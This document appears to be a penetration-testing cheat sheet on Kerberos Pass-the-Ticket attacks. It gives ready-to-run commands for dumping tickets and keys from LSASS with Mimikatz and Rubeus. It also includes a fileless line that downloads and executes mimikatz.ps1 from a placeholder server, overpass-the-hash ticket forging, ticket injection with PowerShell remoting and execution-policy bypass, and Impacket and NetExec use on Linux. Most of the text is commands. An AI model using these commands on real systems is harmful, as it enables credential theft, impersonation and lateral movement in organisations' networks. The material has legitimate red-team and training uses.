Pass the Ticket (PtT)
Pass-the-Ticket (PtT) is a post-exploitation technique in which an attacker uses a valid Kerberos ticket (such as a Ticket Granting Ticket, TGT) to authenticate to services without needing the user's password. This method exploits stolen tickets to bypass normal authentication mechanisms in Windows environments.
PtT attacks typically target Kerberos-protected networks, allowing lateral movement and privilege escalation.
To perform a Pass-the-Ticket (PtT) attack, we need one of two types of Kerberos tickets:
- TGS (Service Ticket): Grants access to a specific resource.
- TGT (Ticket Granting Ticket): Used to request service tickets for any resource the user has privileges for.
Harvesting Tickets
In Windows, the Local Security Authority Subsystem Service (LSASS) is responsible for processing and storing Kerberos tickets. LSASS manages authentication tokens, including TGTs and TGSs, in memory.
We can use tools like Mimikatz or Rubeus to harvest tickets from it.
Mimikatz
mimikatz.exe
privilege::debug
sekurlsa::tickets /export
This will output a file with the .kirbi extension, which contains the tickets.
- Tickets ending with a
$correspond to computer accounts, as they require tickets to communicate with Active Directory. - User tickets include the username and are formatted with an
@separating the service name and the domain.
Example:[random_value]-username@service-domain.tld.kirbi.
Invoke-Mimikatz (Fileless)
IEX (New-Object Net.WebClient).DownloadString('http://<SELF-HOSTED-SERVER-IP>/mimikatz.ps1'); Invoke-Mimikatz -Command 'kerberos::list /export'
Rubeus
Tickets will be in Base64-encoded format and easily copy-able due to the /nowrap flag being set.
rubeus.exe dump /nowrap
Forge our own tickets
To forge a Ticket-Granting Ticket (TGT), the OverPass-the-Hash/Pass-the-Key method converts a user's hash (e.g., RC4, AES) into a valid TGT.
To do this, we first need the user's hash, which can be obtained using Mimikatz:
mimikatz.exe
privilege::debug
sekurlsa::ekeys
With access to the AES256_HMAC and RC4_HMAC keys, we can carry out the OverPass-the-Hash or Pass-the-Key attack using tools like Mimikatz and Rubeus.
Mimikatz
mimikatz.exe
privilege::debug
sekurlsa::pth /domain:rezydev.xyz /user:rezydev /ntlm:<HASH/KEY-OBTAINED>
This opens a new cmd.exe window, allowing us to request access to any service as the target user.
Mimikatz needs admin permission for Pass-the-Hash or Pass-the-Key attack.
Rubeus
rubeus.exe asktgt /domain:rezydev.xyz /user:rezydev /aes256:<HASH/KEY-OBTAINED> /nowrap
We can use any of the following keys/hashes: /rc4, /aes128, /aes256, or /des.
Pass the Ticket (PtT) - Windows
Rubeus
Instead of extracting a key/hash to forge our ticket, we could use the /ptt flag with Rubeus to submit the TGT or TGS directly to the current logon session.
rubeus.exe asktgt /domain:rezydev.xyz /user:rezydev /rc4:<HASH/KEY-OBTAINED> /ptt
rubeus.exe ptt /ticket:FILE.kirbi
# .kirbi to b64
[Convert]::ToBase64String([IO.File]::ReadAllBytes("FILE.kirbi"))
# Or use base64 output from Rubeus directly
rubeus.exe ptt /ticket:<BASE64-ENCODED-TICKET>
Mimikatz
mimikatz.exe
privilege::debug
kerberos::ptt "C:\Users\rezydev\Desktop\FILE.kirbi"
Instead of using cmd.exe to open Mimikatz and import the ticket, we can use the misc::cmd module to launch a new command prompt with the ticket.
PowerShell Remoting
To use PowerShell Remoting with Pass-the-Ticket, import the ticket with Mimikatz and then connect to the target machine using PowerShell.
mimikatz.exe
kerberos::ptt "C:\Users\Administrator.WIN01\Desktop\FILE.kirbi"
exit
powershell -ep bypass # or just 'powershell
Enter-PSSession -ComputerName DC01
Rubeus has the createnetonly option, which creates a hidden sacrificial logon session (Logon type 9). Using the /show flag reveals the process, similar to runas /netonly, preventing the current TGT from being erased.
rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show
# The above command will open a new cmd window.
rubeus.exe asktgt /user:rezydev /domain:rezydev.xyz /aes256:<HASH/KEY-OBTAINED> /ptt
powershell -ep bypass # or just 'powershell'
Enter-PSSession -ComputerName DC01
Pass the Ticket (PtT) - Linux
We can forge a TGT using Impacket's getTGT.py tool:
python3 /path/to/getTGT.py rezydev.local/jethalal:'Pass123@' -dc-ip 10.10.10.10
# This will save jethalal.ccache file
# Set the 'KRB5CCNAME' environment variable point to the file.
export KRB5CCNAME=/path/to/jethalal.ccache
# We can use tools like NetExec using following flag
nxc smb 10.10.10.10 --use-kcache
nxc ldap 10.10.10.10 --use-kcache
# Note: For mssql we need to map the ip and domain at /etc/hosts